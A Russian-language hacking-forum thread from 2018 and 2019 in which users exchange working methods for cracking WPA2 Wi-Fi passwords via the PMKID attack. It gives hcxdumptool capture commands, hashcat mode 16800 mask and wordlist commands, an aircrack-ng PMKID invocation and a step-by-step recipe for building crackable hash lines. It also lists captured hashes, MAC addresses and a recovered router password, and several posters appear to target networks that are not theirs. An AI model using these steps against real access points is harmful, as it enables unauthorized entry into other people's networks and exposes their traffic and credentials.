Кстати, интересно для новичков и не только, протестить и написать инструкцию в тему https://test.antichat.xyz/forums/30/
Можно получить грин репу. А самое главное набраться опыта. Пока эта тема не обуздана, дерзайте.
Уже написали
Pirnazar
15.10.2018, 21:09
Такое возможно сделать "Взлом Wi-Fi без пользователей в Windows (с использованием Wireshark и Npcap для захвата PMKID" ?
Если слово windows заменить на linux, то возможно. Но учитывайте то, что не любая точка поддастся.
binarymaster
16.10.2018, 00:34
Такое возможно сделать "Взлом Wi-Fi без пользователей в Windows (с использованием Wireshark и Npcap для захвата PMKID" ?
Откуда такие мудрые слова вычитал?
Если слово windows заменить на linux, то возможно.
На Windows в теории тоже.
Sektant1
19.10.2018, 18:04
А если точка вещает на частоте 5 GHZ ?
viktor999
19.10.2018, 22:26
А если точка вещает на частоте 5 GHZ ?
Альфу 036ACH купите и пытайте точку
-=charon=-
24.10.2018, 23:55
Достаточно удобный тул:
https://github.com/hash3liZer/WiFiBroot
Sektant1
09.11.2018, 11:21
40 канал не хочет ловить, это 5200 (5GHZ) . [хотя вроде сканирует
rara_ivis
09.11.2018, 21:50
запустил hcxdumptool
словил:
5f3882ffb4b7ff1a2cb3cd6edcc05c31 * 28107b9d928c * a03299080f20 * 44534c2d3236303055
22662d2da3d91715cfa954646bab5591 * c83a350b02d8 * f4f5db3e5830 * 54656e64615f42534e
ec1faa47b83ec4a0304c63f064c698ad * c83a350b02d8 * f0a2258ee88d * 54656e64615f42534e
скормил коту - кот выдал:
5f3882ffb4b7ff1a2cb3cd6edcc05c31 * 28107b9d928c * a03299080f20 * 44534c2d3236303055: xxx59456
проверил: echo 44534c2d3236303055 | xxd -r -p
DSL-2600U
но пас от этой ТД СОВСЕМ ДРУГОЙ и он был в словаре ,
перепроверил второй раз, результат тот же, словил PMKID c помощью wifite и тот же результат.
Думал может "бабка" пас сменила, перепроверил - нет пас тот же "150760Tusia"
Что не так не разгребу
rara_ivis
1. кот нашёл 150760Tusia
2.wifipr нашёл 150760Tusia
3.Пробелы между * это так,чтобы побольше геморроя тестирующим?Я вот дурак например.Раза с третьего разобрался только чего это вдруг программа не принимает.
Оно ведь так не проще наверно?
5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a032 99080f20*44534c2d3236303055
Nikolka00
10.11.2018, 00:06
22662d2da3d91715cfa954646bab5591 * c83a350b02d8 * f4f5db3e5830 * 54656e64615f42534e
ec1faa47b83ec4a0304c63f064c698ad * c83a350b02d8 * f0a2258ee88d * 54656e64615f42534e
f0a2258ee88d - f4f5db3e5830
Строку покажи как кормил кота и ещё, мак адрес атакующего рандом был?
Возможно не тот словился pmkid
pmkid не меняется если запрос не менялся, мак*мак*ТД , другой мак, другой pmkid
rara_ivis
10.11.2018, 00:21
rara_ivis
1. кот нашёл 150760Tusia
2.wifipr нашёл 150760Tusia
3.Пробелы между * это так,чтобы побольше геморроя тестирующим?Я вот дурак например.Раза с третьего разобрался только чего это вдруг программа не принимает.
Оно ведь так не проще наверно?
5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a032 99080f20*44534c2d3236303055
пробелы появились сами , я скопировал текст из Linux в Wiнду и закинул сюда , пришлось еще несколько раз редактировать
rara_ivis
10.11.2018, 00:36
Строку покажи как кормил кота и ещё, мак адрес атакующего рандом был?
Возможно не тот словился pmkid
pmkid ловил рандомно с помощю hcxdumptoo их уловил, 3 шт, скормил коту кот выдал это - 5f3882ffb4b7ff1a2cb3cd6edcc05c31 * 28107b9d928c * a03299080f20 * 44534c2d3236303055: xxx59456
я проверяю essid :
echo 44534c2d3236303055 | xxd -r -p
DSL-2600U
но я знаю что пас от этой тд - 150760Tusia
еще раз проверю , чет я вобще запутался. Пас ххх59456 не подошёл ни к какой из видимых т.д
Nikolka00
10.11.2018, 00:41
xxx59456
я проверяю essid :
echo 44534c2d3236303055 | xxd -r -p
DSL-2600U
д
Не, строку как переберал pmkid на валидный пароль, ты там обмолвился на счет словаря, то что выше это предполагаемый и ты перевел после хекс в Анси - это ТД
Сейчас с мобильного, так бы проверил, надо видимо на мобилу кота поставить
Кста бинарники где можно взять под арм64? Никто не знает?
rara_ivis
10.11.2018, 01:57
Не, строку как переберал pmkid на валидный пароль, ты там обмолвился на счет словаря, то что выше это предполагаемый и ты перевел после хекс в Анси - это ТД
Сейчас с мобильного, так бы проверил, надо видимо на мобилу кота поставить
Кста бинарники где можно взять под арм64? Никто не знает?
вот сохраненные данные pmkid
5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a032 99080f20*44534c2d3236303055
22662d2da3d91715cfa954646bab5591*c83a350b02d8*f4f5 db3e5830*54656e64615f42534e
ec1faa47b83ec4a0304c63f064c698ad*c83a350b02d8*f0a2 258ee88d*54656e64615f42534e
вот их ssid
root@kali:~# echo 44534c2d3236303055 | xxd -r -p
DSL-2600Uroot@kali:~# echo 54656e64615f42534e | xxd -r -p
Tenda_BSNroot@kali:~# echo 54656e64615f42534e | xxd -r -p
Tenda_BSNroot
скормил коту так
hashcat -m 16800 -a 0 -w 3 -o "temp_cracked.txt" test.16800 '/root/02_Slovo_ri/Mask_sborka.txt' --force
hashcat (v4.2.1) starting...
в словаре есть пас от ТД "DSL-2600" я его туда еще раз прописал на всяк случай но кот не определяет этот пасс
вот данные т.д
28:10:7B:9D:92:8C -69 88 91 2 6 65 WPA2 CCMP PSK DSL-2600U 150760Tusia
но кот не определяет этот пасс
Может у Вас в словаре пробел на конце ?, попробуйте по маске.
https://thumb.ibb.co/m3iD3V/2018-11-10-033537.png
rara_ivis
10.11.2018, 06:12
Может у Вас в словаре пробел на конце ?, попробуйте по маске.
https://thumb.ibb.co/m3iD3V/2018-11-10-033537.png
Уже завтра розбор полетов будет , но мне разобратся в этом просто необходимо , ладно если это словарь кривой , другое дело если это баг , я час назад словил pmkid , c этой же т.д и кот кинул в папку с этим же словарем уже другой пасс , как то рандомно чтоли . По идее если hashcat не подбирает пасс он же не должен создавать папку с выводом ?
Nikolka00
10.11.2018, 08:20
По идее если hashcat не подбирает пасс он же не должен создавать папку с выводом ?
так попробуй для пробы, судя по скрину этот PMKID
для выньдос, под линухой возможно надо " заменить на '
hashcat.exe -m 16800 -a 3 -w 3 -o "crack_password.txt" "5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a032 99080f20*44534c2d3236303055" ?d?d?d?d60Tusia --force
rara_ivis
11.11.2018, 08:38
hashcat.exe -m 16800 -a 3 -w 3 -o "crack_password.txt" "5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a032 99080f20*44534c2d3236303055" ?d?d?d?d60Tusia --force[/QUOTE]
по ходу кот сломался по маске не определяет пасс
hashcat --force -m 16800 -a 3 -w 3 -o "temp_cracked.txt" d73fc0f1bfd1d0cd360215e41ab555cc*c83a350b02d8*f0a2 25c1dd6c*54656e64615f42534e ?d?d?d?d60Tusia
hashcat (v4.2.1) starting...
Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: d73fc0f1bfd1d0cd360215e41ab555cc*c83a350b02d8*f0a2 2...42534e
Time.Started.....: Sun Nov 11 04:25:33 2018 (37 secs)
Time.Estimated...: Sun Nov 11 04:26:10 2018 (0 secs)
Guess.Mask.......: ?d?d?d?d60Tusia [11]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 271 H/s (56.36ms) @ Accel:256 Loops:128 Thr:1 Vec:4
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 10000/10000 (100.00%)
Rejected.........: 0/10000 (0.00%)
Restore.Point....: 1000/1000 (100.00%)
Candidates.#1....: 681360Tusia -> 676460Tusia
HWMon.Dev.#1.....: N/A
Started: Sun Nov 11 04:25:28 1632
Stopped: Sun Nov 11 04:26:12 1631
по ходу кот сломался по маске не определяет пасс
Да ну?
hashcat --force -m 16800 -a 3 -w 3 -o "temp_cracked.txt" d73fc0f1bfd1d0cd360215e41ab555cc*c83a350b02d8*f0a2 25c1dd6c*54656e64615f42534e ?d?d?d?d60Tusia
hashcat (v4.2.1) starting...
Tenda_BSN
Hash.Target......: d73fc0f1bfd1d0cd360215e41ab555cc*c83a350b02d8*f0a2 2...42534e
Tenda_BSN
скормил коту - кот выдал:
5f3882ffb4b7ff1a2cb3cd6edcc05c31 * 28107b9d928c * a03299080f20 * 44534c2d3236303055: xxx59456
проверил: echo 44534c2d3236303055 | xxd -r -p
DSL-2600U
но пас от этой ТД СОВСЕМ ДРУГОЙ и он был в словаре ,
перепроверил второй раз, результат тот же, словил PMKID c помощью wifite и тот же результат.
Думал может "бабка" пас сменила, перепроверил - нет пас тот же "150760Tusia"
DSL-2600U
Троллинг мультакк?
rara_ivis
11.11.2018, 20:44
Я глубоко извиняюсь конечно перед теми кто потратил свое время на меня , конечно же с котом и с hcxами все в порядке .
Это очередной пример того что перед тем как бить в колокола нужно с начала углубитться в мануалы, рукаводства и саму тему
а уже потом тревожить гуру этого чата .
сейчас кот мне выдает -это : INFO: All hashes found in potfile! Use --show to display them
похоже хеши в hashcat.potfile
вобщем дорога мне в hashcat.net/wiki/
Nikolka00
12.11.2018, 12:46
кто нибудь сравнивал фактическое быстродействие hashcat и john? версия 18013-omp-x64 понимает pmkid\16800-16001
Логи я не делал. Собирал вручную как советовал TOX1C.
У меня две WI-FI карты на компе, на одной ловил Handshake через airodump-ng: "airodump-ng wlan1 --channel 11 --bssid 44:E9D:**:**:** -w cap2", а на другой подключался с неверным паролем. Затем из .cap файла вытаскивал нужную инфу через Wireshark. Все делал в Kali linux.
а я попробовал нефильтрованный созданный hcxdumptool файл.pcapng протестировать на онлайн-сервисах.
В hcxdumptool применил фильтр канала и фильтр мак-адреса и с телефона подключался неправильным паролем к точке. Так hcxdumptool помимо моего хендшейка (причём без PMKID) захватил ещё один левый в обход моего фильтра и на ондлайн-сервисе расшифровался только мой неправильный пароль.
но самое поганое, что захватил он в обход фильтра 1 левый хендшейк, но ещё проскакивал 1 PMKID и он его не записал.
а я попробовал нефильтрованный созданный hcxdumptool файл.pcapng протестировать на онлайн-сервисах.
В hcxdumptool применил фильтр канала и фильтр мак-адреса и с телефона подключался неправильным паролем к точке. Так hcxdumptool помимо моего хендшейка (причём без PMKID) захватил ещё один левый в обход моего фильтра и на ондлайн-сервисе расшифровался только мой неправильный пароль.
Возможно онлайн-сервис и не предполагает наличие двух разных паролей с одинаковой солью в одном файле (что логично) и прекращает перебор после первого найденного пароля
но вот, что странно:
открыл я этот pcapng как текстовый файл и обнаружил где-то в середине чьё-то имя и фамилию на русском! откуда они там взялись???
ну и ещё пара слов на русском тоже были в разных местах файла.
binarymaster
18.12.2018, 03:01
открыл я этот pcapng как текстовый файл и обнаружил где-то в середине чьё-то имя и фамилию на русском! откуда они там взялись???
Открой в Wireshark и посмотри, в каких конкретно пакетах всё это дело.
Может кто-то пытался к Wi-Fi сетям с русскими названиями подключаться.
Открой в Wireshark и посмотри, в каких конкретно пакетах всё это дело.
Может кто-то пытался к Wi-Fi сетям с русскими названиями подключаться.
да, оказалось именно так.
Monashka
24.12.2018, 22:13
Есть точка, для каждого MAC "клиента" шлёт разный PMKID. (1-й пакет)
Так и должно быть, это так и работает?
binarymaster
24.12.2018, 22:21
Есть точка, для каждого MAC "клиента" шлёт разный PMKID. (1-й пакет)
Так и должно быть, это так и работает?
Надо было учить матчасть.
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Monashka
25.12.2018, 00:38
Надо было учить матчасть.
Кода бы хватило. Я просто спросил, можно было не острить и не умничать, мерзостно выглядит.
А вот кстати про условия при ловле PMKID:
Уровень по модели OSI не тот, учите матчасть. Под Windows этот тип пакетов без режима монитора не поймать.
Отправить можно средствами системы, но опять же, только в managed режиме.
и
Нужно сделать попытку подключения с этого же интерфейса, тогда и только тогда будет нужный пакет.
Я пачками ловлю PMKID просто слушая эфир, на винде. Точки шлют PMKID на любой запрос подключения. Ну кроме тп-линков.
binarymaster
25.12.2018, 00:48
Кода бы хватило. Я просто спросил, можно было не острить и не умничать, мерзостно выглядит.
Можно было прочитать первый пост темы, увидеть там ссылку, прочитать её содержимое, и не спрашивать вообще.
Мерзостно выглядит, когда кто-то так реагирует на мою вполне логичную и обоснованную реакцию.
Piligrim740
02.02.2019, 14:34
Всё мучаю Ростелекомовску точку : 00:1F:CE:CF:EC:08 > QBR-2041WW_ec08 > QTECH LLC
http://rgho.st/6hKTlmJDX
Клиента нет , более 6-ти месяцев...
Сколько ни пробовал , такого пакета так и не нашел : RSN PMKID : и т.д.
Подключался соответственно , с заведомо неверным пином.
Хендшейк отлавливал Beini
Может QTECH LLC не отдаёт PMKID ?
Просвятите
^^^^^^^^^^^^^^^>>>>>>>>>>>>>>
Всё мучаю Ростелекомовску точку : 00:1F:CE:CF:EC:08 > QBR-2041WW_ec08 > QTECH LLC
http://rgho.st/6hKTlmJDX
Клиента нет , более 6-ти месяцев...
Сколько ни пробовал , такого пакета так и не нашел : RSN PMKID : и т.д.
Подключался соответственно , с заведомо неверным пином.
Хендшейк отлавливал Beini
Может QTECH LLC не отдаёт PMKID ?
Просвятите
Нет,эти точки не отдают PMKID.Это поле отсутствует в пакете 1.
Просвятите
на скрине и есть pmkid
binarymaster
03.02.2019, 15:24
на скрине и есть pmkid
На скрине EAPOL пакеты от точки Mikrotik Routerboard, а человек говорит про QTECH:
00:1F:CE:CF:EC:08 > QBR-2041WW_ec08 > QTECH LLC
zgenia44
05.03.2019, 21:09
Привет всем. Может кто поможет сконвертировать PMKID -> CAP. Я бы сам это сделал, но утилита hcxpcaptool выдает ошибку при конвертации
Warning: no capture file loader
https://dropmefiles.com/SCExB
Привет всем. Может кто поможет сконвертировать PMKID -> CAP. Я бы сам это сделал, но утилита hcxpcaptool выдает ошибку при конвертации
Warning: no capture file loader
https://dropmefiles.com/SCExB
а смысл? хешкат нормально pmkid съедает -m 16800 и прям подкидывай свой файл с pmkid
Привет всем. Может кто поможет сконвертировать PMKID -> CAP. Я бы сам это сделал, но утилита hcxpcaptool выдает ошибку при конвертации
Warning: no capture file loader
https://dropmefiles.com/SCExB
wireshark это сделать может
Поддаются ли какие-то модели роутеров Tp-link по pmkid?
VasiliyP
04.04.2019, 16:34
Поддаются ли какие-то модели роутеров Tp-link по pmkid?
http://rgho.st/private/6Nl6qY8ld/6e0a596d7ddf02497af5ad84229e165b
А какие модели Tp-link поддаются и прошивки (если они играют роль)?
VasiliyP
04.04.2019, 17:44
http://rgho.st/private/6Nl6qY8ld/6e0a596d7ddf02497af5ad84229e165b
strings tp-link-pmkid.pcap
...
Archer C1200
А какие модели Tp-link поддаются и прошивки (если они играют роль)?
Поищите по словам tp-link broadcom.
А зачем вам? Купить такой хотите?
Особенно интересуют 740, 741, 840, 841, 845, 940, 941, 945.
Такие поддаются? Или из этих линеек с трёхзначным номером.
Release the Kraken
14.04.2019, 17:42
Парни. Два вопроса можно. Не нашел ответов.
Юзаю Кали. И Wifite. Когда прога находит PMKID то пишет PMKID CRACK: Cracking PMKID using и мой файл словаря.
Прогресс не отображается, как в Aircrack. И соответсвенно не понимаю какой прогой Wifite брутит Pmkid?
И второй вопрос.
PMKID брутится быстрее чем обычный Хэндшейк или скорость такаяже?
У кого какая инфа?
Triton_Mgn
14.04.2019, 18:07
Парни. Два вопроса можно. Не нашел ответов.
Юзаю Кали. И Wifite. Когда прога находит PMKID то пишет PMKID CRACK: Cracking PMKID using и мой файл словаря.
Прогресс не отображается, как в Aircrack. И соответсвенно не понимаю какой прогой Wifite брутит Pmkid?
И второй вопрос.
PMKID брутится быстрее чем обычный Хэндшейк или скорость такаяже?
У кого какая инфа?
1 Брутит - hashcat.
2 Скорость такая же.
Release the Kraken
14.04.2019, 18:12
Спасибо за ответ.
Хэшкет под Wifite брутит тихо? Не выводит прогресс бар? Просто не всегда ясно. Сколько примерно осталось времени. Отходить от компа или подождать.
Я где то встречал инфу что Pmkid чуток быстрее, процентов на 10-15?
Типа там меньше вычислений. В pmkid 256 раундов Hash1 а в eapol 4096.
И плюс в pmkid pmk сразу вшит. А в eapole надо еще довычислять MIC, KMK итп.
Triton_Mgn
14.04.2019, 18:16
Спасибо за ответ.
Хэшкет под Wifite брутит тихо? Не выводит прогресс бар? Просто не всегда ясно. Сколько примерно осталось времени. Отходить от компа или подождать.
Я где то встречал инфу что Pmkid чуток быстрее, процентов на 10-15?
Типа там меньше вычислений. В pmkid 256 раундов Hash1 а в eapol 4096.
И плюс в pmkid pmk сразу вшит. А в eapole надо еще довычислять MIC, KMK итп.
wifite сохраняет pmkid в папку Hs, можно этот файл загнать в кота с параметром -16800 и смотреть прогресс.
Ну на счет одинаково, я говорю примерно, можете провести экперимент.
И выложить сюда свои наблюдения.
Release the Kraken
14.04.2019, 18:58
Тогда теряется удобство и автоматизация от Wifite )
Ну хотя тоже озадачился повышением скорости лома.
Ибо видюх нет. Хочу задействовать 3 компа. Главный под aircrack выдает 1800пмк. Целерон е3400, 775, шина 800, разогнан до 3.3ггц.
Кстати что за формат файла .16800?
Чем отличается? Wireshark его понимает?
Кстати что за формат файла .16800?
Чем отличается? Wireshark его понимает?
Там нечего делать wireshark.Обычный текстовой файл.Строка hash(pmkid)-AP Mac-Station Mac-Essid
16800 ну потому что такой вот hash-mode дали разработчики hashcat
Release the Kraken
14.04.2019, 19:19
Из кракеров pmkid понимает только кошка? Другие не? Ewsa, pyrit, aircrack?
Из кракеров pmkid понимает только кошка? Другие не? Ewsa, pyrit, aircrack?
в aircrack вроде как добавили в 1.4 в конце 2018-го
Другие не? Ewsa, pyrit, aircrack?
WIFIPR поддерживает PMKID.
Pyrit давно не поддерживается разработчиком.Последний форк был 2 Oct 2015.
Release the Kraken
15.04.2019, 02:18
Стоп. А как в EWSA ввести pmkid?
В меню файл-импорт дампов hashcat не получается.
aka_google
15.04.2019, 03:14
Стоп. А как в EWSA ввести pmkid?
В меню файл-импорт дампов hashcat не получается.
на форуме gui лежит для hashcat с функцией pmkid ищи ......
Release the Kraken
15.04.2019, 03:15
Этот гуи я скачал и он к сожалению 64 разрядный.
Release the Kraken
15.04.2019, 03:16
А с EWSA 7 только щас сижу играюсь и не хочет принимать файл .10800
Release the Kraken
15.04.2019, 15:26
Почему hashcat-gui под win xp пишет: не является приложением Win32??
Под win10-32 все запустилось.
Странно
binarymaster
15.04.2019, 16:17
Почему hashcat-gui под win xp пишет: не является приложением Win32??
Под win10-32 все запустилось.
Странно
Значит версия целевой платформы выше NT 5.1
Почему hashcat-gui под win xp пишет: не является приложением Win32??
Под win10-32 все запустилось.
Странно
GUI кота завязана на net framework. Обновите его до v4.6.2
roman921
16.04.2019, 22:03
hashcat не хочет на линукс серваке запускаться, выдает такие ошибки
* AMD GPUs on Linux require this runtime and/or driver:
"RadeonOpenCompute (ROCm)" Software Platform (1.6.180 or later)
* Intel CPUs require this runtime and/or driver:
"OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
* Intel GPUs on Linux require this runtime and/or driver:
"OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
* NVIDIA GPUs require this runtime and/or driver:
"NVIDIA Driver" (367.x or later)
Можете подкинуть инструкцию для его установки на линукс пошаговую.
Release the Kraken
17.04.2019, 01:55
Да тут собсно вопрос даже встал не как Гуи запустить.
Даже из командной строки не пускается.
Хочется раскочегарить машинки под ХР.
Походу pmkid взлом и win xp не совместимы.
Попробую ночью passcape поставить.
для подбора с айркреком работает с фразой ручной сборки по инструкции https://forum.antichat.ru/threads/464369/page-2#post-4238069
aircrack-ng -l password -w dict.txt -I PMKID*MAC_AP*MAC_station*ESSID
сейчас проверил пойдя от обратного, в теме подбора помогли и подкинул готовое. при составлении фразы поаккуратней. если где чего забудете типа звёздочки или ещё чего то сам айркрек не отреагирует своим незапуском, а протарахтит словарём в никуда.
чтобы не удалять много двоеточий в RSN PMKID, при копировании в вайршарке выбирать Copy > Description.
aircrack-ng -l password -w dict.txt -I PMKID*MAC_AP*MAC_station*ESSID
вроде же, можно просто pcap файл ему подсунуть с указанием цели, как раньше всегда делалось.
robot366
28.06.2019, 13:29
Benchmark Hashcat v5.0.0 on 11 * GTX 1080 Ti
Hashmode: 2501 - WPA-EAPOL-PMK (Iterations: 1)
Speed.#1.........: 115.9 MH/s (0.03ms) @ Accel:512 Loops:1 Thr:256 Vec:1
Это правда Миллионы ?? 500 kH/s при переборе обычного хендшейка а это пол миллиона.
Как заполучить этот хеш ?
Насколько я понял из статьи после конечной конвертации hcxpcaptool -z test.16800 test.pcapng получается - 2500 либо новый 16800 а это
WPA-PMKID-PBKDF2 на котором скорость аналогична перебору захваченного хендшейка а нужно WPA-EAPOL-PMK
Это правда Миллионы ?? 500 kH/s при переборе обычного хендшейка а это пол миллиона.<br/>
Как заполучить этот хеш ?<br/>
Насколько я понял из статьи после конечной конвертации hcxpcaptool -z test.16800 test.pcapng получается - 2500 либо новый 16800 а это<br/>
WPA-PMKID-PBKDF2 на котором скорость аналогична перебору захваченного хендшейка а нужно WPA-EAPOL-PMK
2501 — это также взлом пароля из рукопожатия, но используются предварительно рассчитанные plainmasterkeys (мастер ключи в виде простого текста). Получается радужная таблица, но она подходит только для одной ТД, поскольку имя ТД выступает солью. Если вы знакомы с Pyrit, то этот режим аналогичен работе Pyrit. Плюс этого режима: после расчёта plainmasterkeys (долгая стадия) проверка каждого нового рукопожатия для этой же ТД занимает доли секунды. То есть если первое рукопожатие оказалось бракованным, то можно проверить несколько за очень короткое время.
Другими словами,этот метод брута хрош только при условии наличия нескольких ХШ с одинаковым ESSID.Так как используются радужные таблицы.Если оных не имеется,то браться не стоит.Бруть 2500 или 16800.
robot366
28.06.2019, 14:18
Радужная таблица это своего рода тот же словарь только под конкретную ТД ? Насколько это долгая стадия, смогу ли я на обычном пк сделать расчет за недели, месяцы ? То-есть не зависимо от смены essid и пароль имея этот мастер кей любой хендшейк к этот ТД будет перебирать со скорость 100 миллионов ?
С pyrit не знаком. Есть какой-то manual как это сделать ?
Радужная таблица это своего рода тот же словарь только под конкретную ТД ?
Это не словарь,а скорее база данных,созданая на основе словаря,в которой хранятся предварительно вычесленные хэши.
Насколько это долгая стадия
Это зависит от размера импортируемого для расчёта хэшей словаря и мощности GPU.
То-есть не зависимо от смены essid и пароль имея этот мастер кей любой хендшейк к этот ТД будет перебирать со скорость 100 миллионов ?
Нет.Если сменят ESSID,то базу(таблицу) придётся перерасчитывать заново,так как ESSID является солью.А вот если сменят пароль,то это не страшно,и вот уже в этом случае,помогжет радужная таблица,по которой ты уже сможешь прогнать эту же точку с огромной скоростью.Перебор в таких случаях может занимать секунды.
С pyrit не знаком. Есть какой-то менуал как это сделать ?
https://hackware.ru/?p=231
Но учти,Pyrit очень старая прога,и давно не поддерживается разрабом.Последний форк был в 2015.
robot366
28.06.2019, 16:53
Это зависит от размера импортируемого для расчёта хэшей словаря и мощности GPU.
10 цифр все знаки сколько примерно расчет будет на 1080ti ? стандартный брут около 6 часов. так что если расчет более 3 часов смысла в этих радужних таблицах 0.
если только - ESSID является солью то разные маки bssid с одинаковыми названиями можно брутить но таких мало. а регистр букв в essid-e тоже считается ?
10 цифр все знаки сколько примерно расчет будет на 1080ti ?
Несколько секунд.Перебор будет вестись на CPU.Видяха тут не нужна,так как хэши уже просчитаны.Именно за счёт этого и достигается такая большая скорость.
так что если расчет более 3 часов смысла в этих радужних таблицах 0.
Это ещё из первого моего поста можно было понять.Если бы было всё так хорошо с этими таблицами,их юзали бы все кому не лень.
а регистр букв в essid-e тоже считается ?
Да.
разные маки bssid с одинаковыми названиями можно брутить но таких мало
Да,но именно для таких случаев РТ имеют смысл.Их минус ещё и вто,что они занимают туеву хучу места на диске.Но их вроде можно использовать в сжатом виде.
robot366
28.06.2019, 18:24
А как в hashcat под windows запустить расчёт хешей никто не вкурсе ?
На Hackware в нижнем посте человек пишет: Там сейчас тоже добавили режим предварительного расчёта хешей. 26.04.2018
А как из файла pcapng извлечь хендшейки?
hcxdumptool пишет, что они найдены, а как их выцарапать?
Что то pyrit пишет - #1: HMAC_SHA1_AES, bad, spread 1
Неправильные хендшейки?
поймались с помехами, наверное. не совсем чистый\твёрдый приём
Все 16 штук?
Похоже, он так ловит.
hashcat не хочет на линукс серваке запускаться, выдает такие ошибки
* AMD GPUs on Linux require this runtime and/or driver:
"RadeonOpenCompute (ROCm)" Software Platform (1.6.180 or later)
* Intel CPUs require this runtime and/or driver:
"OpenCL Runtime for Intel Core and Intel Xeon Processors" (16.1.1 or later)
* Intel GPUs on Linux require this runtime and/or driver:
"OpenCL 2.0 GPU Driver Package for Linux" (2.0 or later)
* NVIDIA GPUs require this runtime and/or driver:
"NVIDIA Driver" (367.x or later)
Можете подкинуть инструкцию для его установки на линукс пошаговую.
Поиск в гугл - установка драйверов на AMD или NVIDIA - в зависимости от твоей видеокарты
irina001
25.08.2019, 20:49
Запустила tcpdump на андроид по схеме ----tcpdump -nei wlan0 -s0 -xx, попыталась подключиться к точке с того же андроид, сохранила в cap файл, открыла акулой----строка pmkid есть, НО этот cap файл не полный или как? Когда сохранялся pmkid через airodump-там был бекон и 1 фрейм, а здесь только 1 фрейм.Его нужно привести к расшифровке но он какой то неправильный, что не так делаю подскажите....
irina001
25.08.2019, 21:00
"фрейм" в студию!
http://zalil.su/2298931
НО этот cap файл не полный или как?
Да,не хватает бекона.Возможно tcpdump нужно как-то по другому запускать.
Но зная essid, ты можешь легко состряпать pmkid вручную.Просто приведи essid в hex.
Формат: hash*macap*macsta*essid
irina001
25.08.2019, 21:25
Да,не хватает бекона.Возможно tcpdump нужно как-то по другому запускать.
Но зная essid, ты можешь легко состряпать pmkid вручную.Просто приведи essid в hex.
Формат: hash*macap*macsta*essid
трудновато(
трудновато(
Да не очень
TOXIC всё расписал здесь
https://forum.antichat.ru/threads/464369/page-2#post-4238069
Должно быть так
10da545f67a3117a9c76e2397626c8d2*181e7895869f*0243 db682faa*..............
Вместо .............. вставить имя сети в hex(можно воспользоваться ссылкой из того же поста http://www.unit-conversion.info/texttools/hexadecimal/ )
если захватываешь пмкид сразу пучка сетей (ессид одной можно и на память) то параллельно со снятием дампа используй к примеру Wifi Analyzer ( https://4pda.ru/forum/index.php?showtopic=145461), делая снимки окружающей вайфай картины в месте захвата. сохранится в виде csv файлов, затем сопоставишь по маку какая что.
и потом как выше совет онлайн или любым хекс редактором
так брутили эту всю ерунду как хендшейк или как фразу с пмкид?
только так и делаю когда нет возможности хендшейк снять, ввожу что попало и потом разбираю дамп захваченный tcpdump'ом. может по разному реагируют точки на такое дело и где то действительно нужен только валидный, а где и попытка подключения с произвольным паролем
валидный клиент полезен когда работаешь с довольно удалённой точкой, например компом и с внешней антенной, и параллельно со снятием дампа не можешь выступить сам клиентом с любым паролем со своего мобильного устройства, которое вообще может не видеть точку
так не все роутеры отдают пмкид. гораздо реже чем хотелось бы
Anonchik
19.09.2019, 13:12
так не все роутеры отдают пмкид. гораздо реже чем хотелось бы
Какие отдают, а какие нет? Спасибо.
Я уже не раз пытался выловить pmk без клиента.Вследствии чего,возникла идея,инициировать подключение с произвольным пассом.Так ничего и не вышло.Делал попытки подключения с произвольными пассами и в это же время пытался перехватить pmk.
Незнаю,может мне так "повезло".Просил тут,кому не лень,провести этот эксперимент,но вроде никого не нашлось.
Проделывал такое неоднократно на точках без клиентов.
В роли клиента выступил 7200ND с паролем "0987654321". А реальный пасс. находится в PMKID "ZTEGC1E21BDA".
https://dropmefiles.com/gX1gx
Проделывал такое неоднократно на точках без клиентов.
В роли клиента выступил 7200ND с паролем "0987654321". А реальный пасс. находится в PMKID "ZTEGC1E21BDA".
https://dropmefiles.com/gX1gx
Ну наконец-то,хоть кто-то отозвался.Значит мои "умозаключения" в корне не верны.Просто мне так "везло".
ЧАСТИЧНО НЕАКТУАЛЬНО: в версии Aircrack-ng 1.6 появилась возможность задать PMKID в виде строки: aircrack-ng -I
Файлы .cap разные у Airodump-ng и Tcpdump: разнятся link-type (EN10MB и IEEE_80211_11). Есть способ конвертировать файлы Tcpdump в пригодные для работы с Aircrack-ng.
Нам понадобятся: WireShark, hcxtools.
Как известно, для атаки требуются следующие данные:
1) PMKID;
2) BSSID целевой точки;
3) MAC-адрес клиента (в данном случае MAC-адрес Wi-Fi смартфона, с которого производился захват PMKID);
4) ESSID целевой точки.
PMKID вытаскиваем из файла захвата tcpdump с помощью WireShark, остальное нам известно.
Составляем файл file.16800 с такой строкой:
***
Пример:
10da545f67a3117a9c76e2397626c8d2*181e7895869f*0243 db682faa*546573744150
(ESSID в шестнадцатеричном виде, можно переконвертировать с помощью http://www.unit-conversion.info/texttools/hexadecimal/).
Финальный этап – конвертация в .cap для Aircrack-ng:
hcxhash2cap --pmkid file.16800 -c file_aircrack.cap
DjonGerman
30.10.2019, 13:36
Никак не смог получить этот PMKID от роутера XIAOMI
Значит не все роутеры могут отдать его
Значит не все роутеры могут отдать его
да к сожалению не отдают или к примеру как практически все д-линки поголовно делают так:
RSN PMKID: 00000000000000000000000000000000
SEGA_1986
10.11.2019, 23:37
Всем привет. Попробовал на 2х адаптерах, RaLink3070 и RTL8187
Вылетает ошибка.
root@kali:~# hcxdumptool -I --check_driver
wlan interfaces:
00c0ca7ee1XX wlan0mon (rtl8187) warning: probably a monitor interface!
root@kali:~# hcxdumptool -i wlan0mpn -opmkid/capture.pcapng --enable_status=15
initialization...
failed to backup current interface flags, ioctl(SIOCGIFFLAGS) not supported by driver: No such device
failed to init socket
hcxdumptool need full and exclusive access to the adapter
that is not the case
try to use ip link to bring interface down/up
and iw to set monitor mode
terminating...
failed to get interface information: No such device
failed to set interface down: No such device
failed to restore old SIOCSIWMODE: No such device
